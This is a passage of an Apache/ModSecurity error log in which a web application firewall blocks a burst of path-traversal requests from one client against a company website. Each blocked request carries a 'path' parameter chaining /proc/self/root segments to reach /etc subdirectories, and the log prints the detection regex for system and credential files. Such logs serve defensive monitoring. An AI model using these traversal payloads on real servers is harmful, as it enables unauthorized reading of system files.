"OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abux-eyqAr6etmhZHNo3xAAAAFU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 05:21:15.243661 2026] [:error] [pid 15826:tid 140411699963648] [client 74.7.243.128:43550] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/cloud"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abux--oXxyEfFpUF8f_kmQAAAUU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 05:21:20.834821 2026] [:error] [pid 30077:tid 140411716749056] [client 74.7.243.128:43556] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/gss"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuyAPu8EFLIOrSqIptzHgAAAkM"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 05:21:22.135723 2026] [:error] [pid 27403:tid 140411708356352] [client 74.7.243.128:48164] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/pam.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuyAhkFeYa1D6dYQnDC3wAAAcQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 05:21:26.665962 2026] [:error] [pid 14269:tid 140411658000128] [client 74.7.243.128:48180] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/telegraf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuyBgbLMZ6AikZjR9UxcgAAAAo"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 05:21:29.216190 2026] [:error] [pid 17653:tid 140411582465792] [client 74.7.243.128:48194] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/skel"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuyCcdf6f5d65gmYZRHjAAAAtM"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 05:21:33.764160 2026] [:error] [pid 30077:tid 140411548894976] [client 74.7.243.128:36526] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/postfix"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuyDfu8EFLIOrSqIptzNwAAAlc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 05:21:35.139010 2026] [:error] [pid 31803:tid 140411708356352] [client 74.7.243.128:36536] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/firewalld"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuyD-yqAr6etmhZHNo3zAAAAEQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 05:21:36.511326 2026] [:error] [pid 17887:tid 140411658000128] [client 74.7.243.128:36538] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/httpd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuyEAkwaGbbGflqUZCKwgAAAMo"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 05:21:37.851008 2026] [:error] [pid 17887:tid 140411616036608] [client 74.7.243.128:36554] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/ssl"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuyEQkwaGbbGflqUZCKxAAAAM8"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 05:21:39.316909 2026] [:error] [pid 17653:tid 140411733534464] [client 74.7.243.128:36562] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/openldap"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuyE8df6f5d65gmYZRHnwAAAsE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 05:21:40.859374 2026] [:error] [pid 17887:tid 140411674785536] [client 74.7.243.128:52058] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/ntp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuyFAkwaGbbGflqUZCKzAAAAMg"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 05:21:41.045999 2026] [mime_magic:error] [pid 17887:tid 140411632822016] (70014)End of file found: [client 57.141.18.93:43042] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Thu Mar 19 05:21:42.115577 2026] [:error] [pid 27293:tid 140411683178240] [client 74.7.243.128:52062] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/groff"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuyFv-YZRR_7pZ7nDJh6QAAA8c"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 05:21:43.426825 2026] [:error] [pid 19093:tid 140411658000128] [client 74.7.243.128:52066] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/locaweb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuyF1_V7PWP6ixUYl6PuwAAAoo"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 05:21:44.779710 2026] [:error] [pid 27293:tid 140411582465792] [client 74.7.243.128:52070] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/avahi"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuyGP-YZRR_7pZ7nDJh8QAAA9M"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 05:21:49.423178 2026] [:error] [pid 15826:tid 140411683178240] [client 74.7.243.128:52074] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/lwcorp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuyHeoXxyEfFpUF8f_kogAAAUc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 05:21:50.727272 2026] [:error] [pid 27403:tid 140411658000128] [client 74.7.243.128:46160] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/depmod.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuyHhkFeYa1D6dYQnDC7gAAAco"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 05:21:52.015134 2026] [:error] [pid 27403:tid 140411666392832] [client 74.7.243.128:46166] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/systemd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuyIBkFeYa1D6dYQnDC9QAAAck"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 05:21:53.298990 2026] [:error] [pid 19093:tid 140411733534464] [client 74.7.243.128:46178] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/xdg"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuyIV_V7PWP6ixUYl6PwgAAAoE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 05:21:56.320324 2026] [:error] [pid 19093:tid 140411599251200] [client 74.7.243.128:46192] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/audit"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuyI1_V7PWP6ixUYl6PxAAAApE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 05:21:57.674012 2026] [:error] [pid 19093:tid 140411716749056] [client 74.7.243.128:46194] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/terminfo"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuyJV_V7PWP6ixUYl6PyAAAAoM"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 05:22:00.001887 2026] [:error] [pid 19093:tid 140411666392832] [client 74.7.243.128:46202] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/ipmi"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuyKF_V7PWP6ixUYl6PzgAAAok"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 05:22:01.306690 2026] [:error] [pid 26799:tid 140411716749056] [client 74.7.243.128:53086] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/popt.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuyKda6ubjKNq_cu4YXRAAAA0M"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
